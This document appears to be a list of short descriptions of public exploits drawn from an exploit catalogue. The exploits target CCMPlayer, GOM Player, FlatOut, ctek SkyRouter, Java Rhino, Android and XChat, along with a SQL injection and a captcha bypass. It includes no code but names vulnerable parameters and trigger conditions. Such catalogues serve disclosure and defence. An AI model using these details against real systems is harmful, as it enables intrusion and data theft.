This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening a m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an invalid read of an injectible address, thus allowing arbitrary code execution.
When handling 'update' action, 'default_comment_display' is the only parameter that isn't sanitized with mysql_real_escape_string(), this can be exploited to inject arbitrary SQL code. Because of this is a multiple lines query and latest version of MySQL doesn't allow to start comment with /* no followed by a */, sometimes it's impossible to alter the 'users' table content for e.g. changing the admin's password, but is still possible to inject a subquery to fetch for e.g. the session id of admin for a Session Hijacking attack.
This exploit is a crafted ASX file Unicode Stack Buffer Overflow and Arbitrary Code Execution vulnerability in GOM Player version 2.1.33.5071. It allows an attacker to execute arbitrary code on the vulnerable system by sending a specially crafted ASX file. The vulnerability is caused due to a boundary error when handling the title tag of the ASX file. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted ASX file with an overly long title tag.
Multiple .bed files are vulnerable to buffer overflows in the GOG.com copy of FlatOut. An exception offset of 61616161 can be used to overwrite the original playlist_0.bed file in %program files%GOG.comFlatOutdatamusic and launch flatout.exe, resulting in a crash.
This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)
It is possible to bypass the captcha on the JQuery-Real-Person plugin to perform a brute force attack. There is associated parameter with each image, to checkout the characters introduced by the user. But there is not a good chek to assure that the characteres introduced are the characters shown on the picture. Therefore we can just choose a pair of parameter and characters and use them in all the request to the web server. The name of the parameter that determinate the captcha image is 'value'.
Android < 2.3.4 is vulnerable to multiple information disclosure vulnerabilities. An attacker can exploit this vulnerability by hosting a malicious web page and redirecting the user to a content provider URI which will force a download of the HTML/JS payload. This payload will upload the files specified in the $filenames array to the attacker's server. This vulnerability was discovered by Thomas Cannon in 18-Nov-2010 and was assigned CVE-2010-4804.
The application is affected by a stack-based buffer overflow when receiving a long string in the 'HmiLoad' command.
This exploit is a heap overflow vulnerability in XChat <= 2.8.9. It only works on XChat on KDE, and has been tested on Ubuntu (failed), Kubuntu, and Bactrack 5. It requires 1537 of the ascii value 20, followed by an unknown number of any other character to trigger a crash.
Services By CQR